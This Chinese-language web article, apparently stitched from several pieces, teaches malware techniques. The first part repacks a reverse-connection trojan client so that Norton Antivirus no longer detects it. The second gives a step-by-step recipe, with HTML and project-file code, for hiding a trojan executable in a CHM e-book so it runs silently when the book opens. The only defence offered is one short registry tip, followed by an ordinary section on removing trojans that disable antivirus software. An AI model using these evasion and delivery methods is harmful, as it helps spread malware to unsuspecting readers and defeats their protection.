为什么要“加/脱壳”?对于黑客来说,这项技术被淋漓尽致地应用到了伪装木马客户端上,目的是为了防止被杀毒软件反跟踪查杀和被跟踪调试,同时也防止算法程序被别人静态分析。
用pe-scan给木马脱壳
木马研究爱好者cytkk第一时间在国外某著名黑客论坛下载到了最新的反弹端口型木马(以下简称木马Z),正欲体验其强大的功能时,不料被Norton Antivirus逮个正着,令人郁闷不已。cytkk企图使用加壳软件UPX(Ultra Packer For executable)对它进行简单包装来骗过杀毒软件,哪料提示加壳失败,检测得知木马Z早已被程序作者用UPX压缩,当务之急是要先去除这个已被Norton Antivirus识破的“烂”壳。
cytkk运行一款名叫pe-scan 3.31的软件。点击“open”打开木马Z的客户端,在居中的显示框内得知加壳类型为UPX,再点击“unpack”→“start”,cytkk按照提示设置好保存目录和文件名就完成了整个脱壳操作。这样一来就得到了木马Z的原始客户端程序。WWw.ItcompuTer.com.Cn
高手传经:在经过复杂的多重加壳后,检测出的结果就不一定准确了,此时就需要使用“adv.scan”高级扫描, pe-scan会分析出被各种加壳工具加壳的可能性。
重新加壳欺骗杀毒软件
接下来cytkk要做的就是给木马Z的原始客户端进行一次成功的加壳,根据以往的经验,此时用ASPack1.12是个明智之举,它拥有标准的Windows界面,操作简单直观。为了保证加壳后程序的完整性,cytkk放弃了最大可能的压缩,在“选项”中去掉了“压缩资源”的勾选并选择了“保留额外数据”。“压缩”选项很直观,有两个进度条,上面一个表示压缩进度,下面一个则是压缩后的文件大小。压缩完成后,cytkk便迫不及待地点击左边的“测试”按钮来进行完整性测试。结果没让cytkk失望,ASPack的出色表现使以严厉著称的Norton Antivirus对加壳后的木马Z也视而不见了。
文中所述软件打包下载:http://www.sixvee.com/520yy/tools/cytkk-1.rar
CHM木马制作攻略 谈起CHM格式的电子书,可能无人不晓。有很大一部分电子图书都是使用CHM格式编译的。由于木马程序嵌入了电子书中,杀毒软件无法对其中存在的病毒等破坏性程序进行检查和清除。想知道这类电子书的制作方法吗?今天笔者就以实例形式和大家一道分析一下。
Step1:要想制作一个完美的CHM木马,当然少不了电子书的制作工具。在这里我们选择微软自家的Microsoft HTML Help Workshop,汉化版本可以在http://www.sixvee.com/520yy/tools/cytkk-2.rar下载。
当然了,作为木马程序的载体,一本CHM电子书是少不了的。本文演示所采用的是系统帮助文件中现成的windows.chm。
Step2:首先运行windows.chm,在右侧的空白处点击右键菜单,进入“属性”页。记录下该电子文档的默认主页default.htm和标题栏文字Windows 2000两项信息。
Step3:接下来需要制作一个可以让木马运行并且同时可以自动跳转到windows.chm默认主页的网页,例如cytkk.htm,源代码如下:
<HTML>
<HEAD>
<meta http-equiv="refresh" content="3;url='default.htm'">
</HEAD>
<BODY>
<OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="灰色按钮克星.exe">
</OBJECT>
</BODY>
</HTML>
代码注释:
content="3是转向时间(单位为秒),可以根据木马程序的运行时间自行修改,建议不要超过5秒。其中的default.htm可以改为你用的电子书的默认主页名,灰色按钮克星.exe为木马程序名,你可以根据情况更改。
Step4:运行HTML Help Workshop,选择文件菜单下的反编译项。接下来在反编译后的目录中可以看到windows.hhc(对应帮助文档左侧的“目录”项)和windows.hhk(对应帮助文档左侧的“索引”项)。
Step5:现在要做的就是把木马程序复制到反编译后的目录中(本文中以插入灰色按钮克星.exe这款小软件为例),并在此目录下建立一个例如文件名为cytkk.hhp的文件(用记事本即可),代码如下:
[OPTIONS]
Compatibility=1.1 Or later
Compiled file=windows.chm
Default Window=Main
Language=0x804 中文(中国)
[WINDOWS]
Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
[FILES]
cytkk.htm
灰色按钮克星.exe
代码注释:
windows.chm可以改为你要生成的电子书名,而灰色按钮克星.exe则把它改为要嵌入的木马程序名,Main=后面改为在第一步时你得到的标题栏文字,windows.hhc及windows.hhk分别改为第三步得到的文件名。
最后用HTML Help Workshop打开cytkk.hhp,点击“文件”→“编译”,待提示完成后,就可以在目标目录中发现已经编译好的带有木马的电子书windows.chm了。
高手传经:防之有道
我们不可能对下载的每本书都进行反编译工作来加以检查,那是会累死人的。笔者建议大家在下载电子书籍时,尽量去知名网站下载。
另外读者朋友们也可以修改本地安全属性,使CHM木马无法在本地运行木马程序,将注册表“HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Internet Settings\Zones\0”下的1004项的值由原来十进制的0改为十六进制的3。
解决木马病毒使杀毒软件无法打开的问题
很多朋友都碰到过这样的问题,打开金山杀毒软件无法打开,就连在百度搜索金山杀毒,结果网页也就自动关闭了,打开百度网页却是正常。试了其他的杀毒软件,发现也是会被关闭,只要和杀毒相关或者瑞星、金山、在线杀毒、卡巴斯基、360,安全卫士等字眼的网页都是打开马上就被关闭。
碰到这样的问题,百分百是由电脑本身的程序引起的,木马病毒程序在电脑启动的可能性最大。而且通常当此类木马启动后,进程就会驻留内存,并实时监测常见的杀毒软件进程,如卡巴、金山、瑞星、360等,要么干掉杀毒软件的进程,要么阻断其核心进程使之瘫痪,杀毒软件就变成了傀儡。
解决此类杀毒软件无法打开的方法有很多,比如手动删除木马进程、清理木马相关注册表项是首选,以下我们提供两种解决方法:
1. 清除木马。 首先,需要下载360安全卫士绿色版,利用360安全卫士可以清理大部分内存驻留病毒和木马(进入安全模式清除),然后重启电脑,更新杀毒软件病毒库,并全盘扫描电脑。扫描完之后,对查杀到的木马病毒进行清理。这个是最简单的,当然还可不借助软件,进行手工杀毒,这个就比较复杂了,一般从启动项(或注册表)入手,先取消木马的自动启动。
2. 重新安装系统。 如果上面的方法不行,不建议你再寻找其它的方法。最终还是要回到重新安装系统的路子,不过在重新安装系统前不要忘记了备份重要的资料。如何重新安装系统?相信大家都很熟悉了,如果不会还是找人来帮忙。如果你对自己很有信心,不妨去街上买一个装机盘或者电脑有ghost镜像自己直接恢复一下,几分钟就ok了。
From:http://www.itcomputer.com.cn/Article/Network/201309/1045.html